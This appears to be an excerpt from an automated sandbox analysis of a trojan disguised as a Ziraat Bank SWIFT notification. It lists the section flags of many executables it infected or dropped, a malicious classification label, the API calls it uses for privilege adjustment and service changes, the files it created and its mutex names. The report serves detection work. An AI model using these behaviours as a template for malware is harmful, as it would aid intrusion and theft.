Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@38/165@55/19

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb9ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb-inf
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb7d8e3ee9-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
